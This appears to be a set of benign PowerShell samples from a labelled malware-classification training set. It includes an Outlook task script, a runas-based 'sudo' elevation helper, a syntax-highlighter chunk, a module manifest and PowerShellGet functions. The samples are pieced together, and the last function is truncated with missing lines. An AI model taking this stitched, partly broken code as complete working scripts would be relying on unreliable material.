76wFSHrYpVOWESxBEdlHAJPFuLHVjiInD48M0tzQd/X2pfZeJfS7ZIz0JZNOOzP1 # K8KMgpLEJkUI2//OkoiWwfHuFA1AdIxsqHT/DCfzq6IgAsSNrNSzMTT5fqtw5sN9 # TiH87/S+ZsXcExH7jmsBkwARMmxEM/EckKj/lcaFZ2D8ugnldYGs4Mvjhg2s3sVG # ccQACvTqx+Wpnx55XcW4Mp0/mHX1ZScZbA7Uf9mNTM6hUaJXeDCCB3EwggVZoAMC # AQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNV # BAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w # HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29m # dCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIy # NVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9 # DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2 # Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N # 7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXc # ag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJ # j361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjk # lqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37Zy # L9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M # 269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLX # pyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLU # HMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode # 2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEA # ATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYE # FJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEB # MEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # RG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEE # AYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB # /zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEug # SaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9N # aWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsG # AQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jv # b0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt # 4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsP # MeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++ # Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9 # QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2 # wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aR # AfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5z # bcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nx # t67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3 # Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+AN # uOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/Z # cGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNZMIICQQIBATCCAQGhgdmkgdYw # gdMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsT # JE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMe # blNoaWVsZCBUU1MgRVNOOjQwMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQCEY0cP9rtDRtAt # ZUb0m4bGAtFex6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MA0GCSqGSIb3DQEBCwUAAgUA6snSCDAiGA8yMDI0MTAyODA5MDQwOFoYDzIwMjQx # MDI5MDkwNDA4WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDqydIIAgEAMAoCAQAC # AgiwAgH/MAcCAQACAhLGMAoCBQDqyyOIAgEAMDYGCisGAQQBhFkKBAIxKDAmMAwG # CisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQEL # BQADggEBADNJzLXAFulwDG4ktiexNvYLVH/Vlc9FOtX7vDiLPH6hc4cBS71ocYbS # pI4GOTtWDIK+MUyKtPXUcgsEFMdOIlwDXPlvk4h3KzRFZZycsJAZIoi2bwo02l4T # 6gT2+JBEcwuxT/dvyG7NYQdMN447JzzA1UgkJw9cMZCDjZh/Woyqg+mrIKYxNKOf # ddDSeWWY14YJ5SR0iw1OnAPiZttVc9Wr4ptW3+Nq0lnDditOePODWPkB2uiUD9o3 # cKMzSB/blfAMRNqfPsotseR/PmDEA3yolNhtI6jIZNivxyXlGquun7SPCmUr5L0V # VSnBk20pTBhI2I5KwD1Llt8OY6Bx3yQxggQNMIIECQIBATCBkzB8MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg # VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAf7QqMJ7NCELAQABAAAB/jANBglghkgB # ZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3 # DQEJBDEiBCB8Z63KBrkt0BsoLAYEXqIh1F+boZxp+5+GLyl5GjbyLzCB+gYLKoZI # hvcNAQkQAi8xgeowgecwgeQwgb0EIBGFzN38U8ifGNH3abaE9apz68Y4bX78jRa2 # QKy3KHR5MIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0 # b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh # dGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA # AAH+0KjCezQhCwEAAQAAAf4wIgQgEdpvkq3zQZh4gWo+N1cBUbQciDORDclLAfrk # pRpKe+gwDQYJKoZIhvcNAQELBQAEggIAlhizvhf4MRhZZbXzQIQGUwhR8ZGdNFTK # jt26xrIl3JIMKXJsNM8Bu87pcPQHW9yof5OaQcKMoBjnHQfu8J3UUM3csMyR8BY6 # JQ3BwAJW7F/H/xjv1uOA/K0b7Mj/rCXskvYBEfcpSCgmMzfJX5ncUUkLDBnaInr9 # NpuNfq9cok1pIuy/DMJcej0sJchiC7GyxZZqHo4QAqbhXMs1l/as1j5wo46zRr8A # MH7vEj2yM5vWyuKVcGy/kP+L0vEuSlvtOvqUtsMrWVq8w3PY5ndKKub9j8EMaHQe # BZVmB4pX3XmveGhFVa3x71Z9M+YWWoZ+2NVvawnmdbk3yVxO2AM9UGx/L5BFUakz # JEuCqwmI6cZbDM2HFiGJATp288oo142/J+94yzywMOMVXGFlUP3fsuTSIF7bwFHG # 5t352cwlzzOpuvA+7g4xKtzkEh3PT7ZSJwc/KHD6sjX8d0uhNUHvu1nkup/eTE3Z # IYoZcJRWI0nNLtO+WsMlKh4X4b3vtDniLkRX/ptR30TEiGBwb8PDHk9z3PHbLozd # OS1v19eSgPCf/Y2Zt4MWw87Kb372v5XN751Lu5YX6Lnqd+fgKex+3iNks5Wj5snI # jjWt1FW8wo62CmEtsjjo53iN/uIj0OiB6T6iYaaLs99F8B4QadRWmp53IqK1ZBIV # Pw3tEZypWRY= # SIG # End signature block
combined_dataset/train/non-malicious/New-Task.ps1
New-Task.ps1
<# .SYNOPSIS Creates a task in Outlook .DESCRIPTION Allows for the creation of tasks in Microsoft Outlook from Windows PowerShell. The majority of task options available can be configured with the function. .LINK http://www.leeholmes.com/blog/GettingThingsDoneOutlookTaskAutomationWithPowerShell.aspx .EXAMPLE C:\\PS>New-Task -Subject "Create PowerShell script to create Outlook tasks" Description ----------- This example just a simple Outlook Task with the specified subject. .EXAMPLE C:\\PS>New-Task -Subject "Create powershell script to create outlook calendar entries" -Categories "%PowerShell" -DueDate "2/01/2009" -Status "InProgress" -Display Description ----------- This example demonstrates the creation of task using additional options. The '-display' parameter brings up the Outlook task form at the end to allow you make additional changes in the UI. .INPUTTYPE .RETURNVALUE .COMPONENT .ROLE .FUNCTIONALITY .PARAMETER Subject Sets the subject of the task. .PARAMETER Body Sets the body of the task. .PARAMETER Categories Sets the categories for the task. Comma seperate the values for multiple categories. .PARAMETER StartDate Sets the start date of the task. Must be in a format that can be converted to [datetime] object. .PARAMETER DueDate Sets the due date of the task. Must be in a format that can be converted to [datetime] object. .PARAMETER PercentComplete Sets the percent complete for the new task. Value must be an int from 0 to 100. .PARAMETER ReminderTime Sets the reminder time of the task. Must be in a format that can be converted to [datetime] object. .PARAMETER Status Sets the the status of the new task. Valid values are "Completed", "Deferred", "InProgress","Waiting" .PARAMETER Priority Sets the priority value of the new task. Valid values are "Low", "Medium", "High" .PARAMETER Display Displays the Outlook task form after saving. .NOTES Name: New-Task Author: Mark E. Schill Date Created: 01/24/2009 Date Revised: 01/24/2009 Version: 1.0 History: 1.0 01/24/2009 - Initial Revision #> [CmdletBinding()] # TODO: Handle the status and priority param( [Parameter(Position=0, Mandatory=$true, ValueFromPipeline=$true)] [string] $Subject , [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [string] $Body , # TODO: Be able to specify "today, tomorrow, next week, etc" and convert that to appropriate date. # http://refactormycode.com/codes/488-parse-relative-date [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [DateTime] $StartDate , # TODO: Be able to specify "today, tomorrow, next week, etc" and convert that to appropriate date. [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [DateTime] $DueDate , [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [string] $Status , [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [string] $Priority , [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [int] $PercentComplete = 0 , [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [DateTime] $ReminderTime , [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [string] $Categories , [Parameter(Mandatory=$false, ValueFromPipeline=$false)] [switch] $Display ) Begin { $olTaskItem = "olTaskItem" <# 3 #> $olFolderTasks = "olFolderTasks" <# 13 #> $Outlook = New-Object -ComObject Outlook.Application } Process { $Task = $Outlook.Application.CreateItem($olTaskItem) $ContainsError = $false $Task.Subject = $Subject $Task.PercentComplete = $PercentComplete $Task.Body = $Body if ( $Categories ) { $Task.Categories = $Categories } if ( $StartDate ) { $Task.StartDate = $StartDate } if ( $DueDate ) { $Task.DueDate = $DueDate } switch ( $Status ) { "Completed" { $Task.Status = [Microsoft.Office.Interop.Outlook.OlTaskStatus]::olTaskComplete $Task.PercentComplete = 100 # Overrides PercentComplete if specified } "Deferred" { $Task.Status = [Microsoft.Office.Interop.Outlook.OlTaskStatus]::olTaskDeferred } "InProgress" { $Task.Status = [Microsoft.Office.Interop.Outlook.OlTaskStatus]::olTaskInProgress } "Waiting" { $Task.Status = [Microsoft.Office.Interop.Outlook.OlTaskStatus]::olTaskWaiting } default { $Task.Status = [Microsoft.Office.Interop.Outlook.OlTaskStatus]::TaskNotStarted } } switch ($Priority ) { "Low" { $Task.Importance = [Microsoft.Office.Interop.Outlook.OlImportance]::olImportanceLow } "High" { $Task.Importance = [Microsoft.Office.Interop.Outlook.OlImportance]::olImportanceHigh } default { $Task.Importance = [Microsoft.Office.Interop.Outlook.OlImportance]::olImportanceNormal } } if ( $ReminderTime ) { $Task.ReminderTime = $ReminderTime $Task.ReminderSet = $True } if ( -not $ContainsError) { $Task.Save() if ($Display ) { $Task.Display() } } } End { $Outlook = $Null }
combined_dataset/train/non-malicious/4373.ps1
4373.ps1
function Get-AvailableRoleCapabilityName { [CmdletBinding(PositionalBinding=$false)] Param ( [Parameter(Mandatory=$true)] [ValidateNotNullOrEmpty()] [PSModuleInfo] $PSModuleInfo ) $RoleCapabilityNames = @() $RoleCapabilitiesDir = Join-PathUtility -Path $PSModuleInfo.ModuleBase -ChildPath 'RoleCapabilities' -PathType Directory if(Microsoft.PowerShell.Management\Test-Path -Path $RoleCapabilitiesDir -PathType Container) { $RoleCapabilityNames = Microsoft.PowerShell.Management\Get-ChildItem -Path $RoleCapabilitiesDir ` -Name -Filter *.psrc | ForEach-Object {[System.IO.Path]::GetFileNameWithoutExtension($_)} } return $RoleCapabilityNames }
combined_dataset/train/non-malicious/sample_63_51.ps1
sample_63_51.ps1
(this.webpackJsonp=this.webpackJsonp||[]).push([[206],{237:function(e,t){Prism.languages.powershell={comment:[{pattern:/(^|[^`])<#[\s\S]*?#>/,lookbehind:!0},{pattern:/(^|[^`])#.*/,lookbehind:!0}],string:[{pattern:/"(?:`[\s\S]|[^`"])*"/,greedy:!0,inside:{function:{pattern:/(^|[^`])\$\((?:\$\(.*?\)|(?!\$\()[^\r\n)])*\)/,lookbehind:!0,inside:{}}}},{pattern:/'(?:[^']|'')*'/,greedy:!0}],namespace:/\[[a-z](?:\[(?:\[[^\]]*]|[^\[\]])*]|[^\[\]])*]/i,boolean:/\$(?:true|false)\b/i,variable:/\$\w+\b/i,function:[/\b(?:Add-(?:Computer|Content|History|Member|PSSnapin|Type)|Checkpoint-Computer|Clear-(?:Content|EventLog|History|Item|ItemProperty|Variable)|Compare-Object|Complete-Transaction|Connect-PSSession|ConvertFrom-(?:Csv|Json|StringData)|Convert-Path|ConvertTo-(?:Csv|Html|Json|Xml)|Copy-(?:Item|ItemProperty)|Debug-Process|Disable-(?:ComputerRestore|PSBreakpoint|PSRemoting|PSSessionConfiguration)|Disconnect-PSSession|Enable-(?:ComputerRestore|PSBreakpoint|PSRemoting|PSSessionConfiguration)|Enter-PSSession|Exit-PSSession|Export-(?:Alias|Clixml|Console|Csv|FormatData|ModuleMember|PSSession)|ForEach-Object|Format-(?:Custom|List|Table|Wide)|Get-(?:Alias|ChildItem|Command|ComputerRestorePoint|Content|ControlPanelItem|Culture|Date|Event|EventLog|EventSubscriber|FormatData|Help|History|Host|HotFix|Item|ItemProperty|Job|Location|Member|Module|Process|PSBreakpoint|PSCallStack|PSDrive|PSProvider|PSSession|PSSessionConfiguration|PSSnapin|Random|Service|TraceSource|Transaction|TypeData|UICulture|Unique|Variable|WmiObject)|Group-Object|Import-(?:Alias|Clixml|Csv|LocalizedData|Module|PSSession)|Invoke-(?:Command|Expression|History|Item|RestMethod|WebRequest|WmiMethod)|Join-Path|Limit-EventLog|Measure-(?:Command|Object)|Move-(?:Item|ItemProperty)|New-(?:Alias|Event|EventLog|Item|ItemProperty|Module|ModuleManifest|Object|PSDrive|PSSession|PSSessionConfigurationFile|PSSessionOption|PSTransportOption|Service|TimeSpan|Variable|WebServiceProxy)|Out-(?:Default|File|GridView|Host|Null|Printer|String)|Pop-Location|Push-Location|Read-Host|Receive-(?:Job|PSSession)|Register-(?:EngineEvent|ObjectEvent|PSSessionConfiguration|WmiEvent)|Remove-(?:Computer|Event|EventLog|Item|ItemProperty|Job|Module|PSBreakpoint|PSDrive|PSSession|PSSnapin|TypeData|Variable|WmiObject)|Rename-(?:Computer|Item|ItemProperty)|Reset-ComputerMachinePassword|Resolve-Path|Restart-(?:Computer|Service)|Restore-Computer|Resume-(?:Job|Service)|Save-Help|Select-(?:Object|String|Xml)|Send-MailMessage|Set-(?:Alias|Content|Date|Item|ItemProperty|Location|PSBreakpoint|PSDebug|PSSessionConfiguration|Service|StrictMode|TraceSource|Variable|WmiInstance)|Show-(?:Command|ControlPanelItem|EventLog)|Sort-Object|Split-Path|Start-(?:Job|Process|Service|Sleep|Transaction)|Stop-(?:Computer|Job|Process|Service)|Suspend-(?:Job|Service)|Tee-Object|Test-(?:ComputerSecureChannel|Connection|ModuleManifest|Path|PSSessionConfigurationFile)|Trace-Command|Unblock-File|Undo-Transaction|Unregister-(?:Event|PSSessionConfiguration)|Update-(?:FormatData|Help|List|TypeData)|Use-Transaction|Wait-(?:Event|Job|Process)|Where-Object|Write-(?:Debug|Error|EventLog|Host|Output|Progress|Verbose|Warning))\b/i,/\b(?:ac|cat|chdir|clc|cli|clp|clv|compare|copy|cp|cpi|cpp|cvpa|dbp|del|diff|dir|ebp|echo|epal|epcsv|epsn|erase|fc|fl|ft|fw|gal|gbp|gc|gci|gcs|gdr|gi|gl|gm|gp|gps|group|gsv|gu|gv|gwmi|iex|ii|ipal|ipcsv|ipsn|irm|iwmi|iwr|kill|lp|ls|measure|mi|mount|move|mp|mv|nal|ndr|ni|nv|ogv|popd|ps|pushd|pwd|rbp|rd|rdr|ren|ri|rm|rmdir|rni|rnp|rp|rv|rvpa|rwmi|sal|saps|sasv|sbp|sc|select|set|shcm|si|sl|sleep|sls|sort|sp|spps|spsv|start|sv|swmi|tee|trcm|type|write)\b/i],keyword:/\b(?:Begin|Break|Catch|Class|Continue|Data|Define|Do|DynamicParam|Else|ElseIf|End|Exit|Filter|Finally|For|ForEach|From|Function|If|InlineScript|Parallel|Param|Process|Return|Sequence|Switch|Throw|Trap|Try|Until|Using|Var|While|Workflow)\b/i,operator:{pattern:/(\W?)(?:!|-(eq|ne|gt|ge|lt|le|sh[lr]|not|b?(?:and|x?or)|(?:Not)?(?:Like|Match|Contains|In)|Replace|Join|is(?:Not)?|as)\b|-[-=]?|\+[+=]?|[*\/%]=?)/i,lookbehind:!0},punctuation:/[|{}[\];(),.]/},Prism.languages.powershell.string[0].inside.boolean=Prism.languages.powershell.boolean,Prism.languages.powershell.string[0].inside.variable=Prism.languages.powershell.variable,Prism.languages.powershell.string[0].inside.function.inside=Prism.languages.powershell}}]); //# sourceMappingURL=206.fef30db7.chunk.js.map
combined_dataset/train/non-malicious/sudo for Powershell.ps1
sudo for Powershell.ps1
# sudo.ps1 # # Authors: Brian Marsh, mrigns, This guy: http://tsukasa.jidder.de/blog/2008/03/15/scripting-sudo-with-powershell # # Sources: # http://tsukasa.jidder.de/blog/2008/03/15/scripting-sudo-with-powershell # http://www.ainotenshi.org/%E2%80%98sudo%E2%80%99-for-powershell-sorta # # Version: # 1.0 Initial version # 1.1 added -ps flag, cleaned up passed $file/$script full path # 1.2 Comments # 1.3 Fixed passing working directory to powershell/auto closing param( [switch]$ps, # Switch for running args as powershell script [string]$file, # Script/Program to run [string]$arguments = $args # Arguments to program/script ) # Find our powershell full path $powershell = (get-command powershell).definition # Get current directory $dir = get-location #If we're running this as a elevated powershell script if ($ps){ # Script verification if([System.IO.File]::Exists("$(get-location)\\$file")) { # Set the $script to full path of the ps script $script = (get-childitem $file).fullname } # Create a powershell process $psi = new-object System.Diagnostics.ProcessStartInfo $powershell $psi.WorkingDirectory = Get-Location # Combine the script and its arguments $sArgs = $script + " " + $arguments # Set the arguments to be the ps script and it's arguments $psi.Arguments = "-noexit -command set-location $dir; $sArgs" # Magic to run as elevated $psi.Verb = "runas"; } # We're running something other than a powershells script else { # File verification if([System.IO.File]::Exists("$(get-location)\\$file")) { # Get full path $file = (get-childitem $file).fullname } # Same as above, create proccess/working directory/arguments/runas $psi = new-object System.Diagnostics.ProcessStartInfo $file $psi.Arguments = $arguments $psi.Verb = "runas" } # Start the process [System.Diagnostics.Process]::Start($psi)
combined_dataset/train/non-malicious/sample_36_68.ps1
sample_36_68.ps1
# # Module manifest for module 'OCI.PSModules.Opa' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Opa.dll' # Version number of this module. ModuleVersion = '83.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'b3b17045-1e55-4c1b-8e02-641f25d4bb58' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Opa Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Opa.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIOpaInstance', 'Get-OCIOpaInstancesList', 'Get-OCIOpaWorkRequest', 'Get-OCIOpaWorkRequestErrorsList', 'Get-OCIOpaWorkRequestLogsList', 'Get-OCIOpaWorkRequestsList', 'Move-OCIOpaInstanceCompartment', 'New-OCIOpaInstance', 'Remove-OCIOpaInstance', 'Start-OCIOpaInstance', 'Stop-OCIOpaInstance', 'Stop-OCIOpaWorkRequest', 'Update-OCIOpaInstance' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Opa' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/4414.ps1
4414.ps1
function Test-ScriptFileInfo { [CmdletBinding(PositionalBinding = $false, DefaultParameterSetName = 'PathParameterSet', HelpUri = 'https://go.microsoft.com/fwlink/?LinkId=619791')] Param ( [Parameter(Mandatory = $true, Position = 0, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'PathParameterSet')] [ValidateNotNullOrEmpty()] [string] $Path, [Parameter(Mandatory = $true, ValueFromPipelineByPropertyName = $true, ParameterSetName = 'LiteralPathParameterSet')] [Alias('PSPath')] [ValidateNotNullOrEmpty()] [string] $LiteralPath ) Process { $scriptFilePath = $null if ($Path) { $scriptFilePath = Resolve-PathHelper -Path $Path -CallerPSCmdlet $PSCmdlet | Microsoft.PowerShell.Utility\Select-Object -First 1 -ErrorAction Ignore if (-not $scriptFilePath -or -not (Microsoft.PowerShell.Management\Test-Path -Path $scriptFilePath -PathType Leaf)) { $errorMessage = ($LocalizedData.PathNotFound -f $Path) ThrowError -ExceptionName "System.ArgumentException" ` -ExceptionMessage $errorMessage ` -ErrorId "PathNotFound" ` -CallerPSCmdlet $PSCmdlet ` -ExceptionObject $Path ` -ErrorCategory InvalidArgument return } } else { $scriptFilePath = Resolve-PathHelper -Path $LiteralPath -IsLiteralPath -CallerPSCmdlet $PSCmdlet | Microsoft.PowerShell.Utility\Select-Object -First 1 -ErrorAction Ignore if (-not $scriptFilePath -or -not (Microsoft.PowerShell.Management\Test-Path -LiteralPath $scriptFilePath -PathType Leaf)) { $errorMessage = ($LocalizedData.PathNotFound -f $LiteralPath) ThrowError -ExceptionName "System.ArgumentException" ` -ExceptionMessage $errorMessage ` -ErrorId "PathNotFound" ` -CallerPSCmdlet $PSCmdlet ` -ExceptionObject $LiteralPath ` -ErrorCategory InvalidArgument return } } if (-not $scriptFilePath.EndsWith('.ps1', [System.StringComparison]::OrdinalIgnoreCase)) { $errorMessage = ($LocalizedData.InvalidScriptFilePath -f $scriptFilePath) ThrowError -ExceptionName "System.ArgumentException" ` -ExceptionMessage $errorMessage ` -ErrorId "InvalidScriptFilePath" ` -CallerPSCmdlet $PSCmdlet ` -ExceptionObject $scriptFilePath ` -ErrorCategory InvalidArgument return } $PSScriptInfo = New-PSScriptInfoObject -Path $scriptFilePath [System.Management.Automation.Language.Token[]]$tokens = $null; [System.Management.Automation.Language.ParseError[]]$errors = $null; $ast = [System.Management.Automation.Language.Parser]::ParseFile($scriptFilePath, ([ref]$tokens), ([ref]$errors)) $notSupportedOnNanoErrorIds = @('WorkflowNotSupportedInPowerShellCore', 'ConfigurationNotSupportedInPowerShellCore') $errorsAfterSkippingOneCoreErrors = $errors | Microsoft.PowerShell.Core\Where-Object { $notSupportedOnNanoErrorIds -notcontains $_.ErrorId } if ($errorsAfterSkippingOneCoreErrors) { $errorMessage = ($LocalizedData.ScriptParseError -f $scriptFilePath) ThrowError -ExceptionName "System.ArgumentException" ` -ExceptionMessage $errorMessage ` -ErrorId "ScriptParseError" ` -CallerPSCmdlet $PSCmdlet ` -ExceptionObject $errorsAfterSkippingOneCoreErrors ` -ErrorCategory InvalidArgument return } if ($ast) { if ($commentLines.Count -gt 2) { for ($i = 1; $i -lt ($commentLines.count - 1); $i++) { $line = $commentLines[$i] if (-not $line) { continue } if ($line.trim().StartsWith('.')) { $parts = $line.trim() -split '[.\s+]', 3 | Microsoft.PowerShell.Core\Where-Object { $_ } if ($KeyName -and $Value) { if ($keyName -eq $script:ReleaseNotes) { $Value = $Value.Trim() -split '__NEWLINE__' } elseif ($keyName -eq $script:DESCRIPTION) { $Value = $Value -split '__NEWLINE__' $Value = ($Value -join "`r`n").Trim() } else { $Value = $Value -split '__NEWLINE__' | Microsoft.PowerShell.Core\Where-Object { $_ } if ($Value -and $Value.GetType().ToString() -eq "System.String") { $Value = $Value.Trim() } } 